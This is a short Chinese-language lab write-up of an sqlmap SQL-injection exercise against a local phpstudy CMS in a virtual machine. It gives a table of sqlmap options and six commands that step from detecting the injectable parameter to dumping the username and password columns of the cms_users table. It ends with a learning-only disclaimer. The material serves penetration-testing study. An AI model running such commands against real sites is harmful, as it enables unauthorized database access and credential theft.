记一次sqlmap的案例实验
环境搭建
网站搭建–window server 2008 phpstudy
测试机 kali虚拟机
Sql map参数
| 参数 | 含义 |
|---|---|
| -u “url” | 检测注入点 |
| –dbs | 列出所有数据库的名字 |
| –current-db | 列出当前数据库的名字 |
| -D | 指定一个数据库 |
| –tables | 列出表名 |
| -T | 指定表名 |
| –columns | 列出所有的字段名 |
| -C | 指定字段 |
| –dump | 列出字段内容 |
第一步 检测注入点
[sqlmap -u http://192.168.139.136/cms/show.php?id=33]
第二步 列出所有数据库的名字
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --dbs]
第三步 列出当前数据库的名字
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --current-db]
第四步 列出表名
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables]
第五步列出所有的字段名
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables -T cms_users --columns]
第六步 列出字段内容
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms -T cms_users -C "username,password" --dump]
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!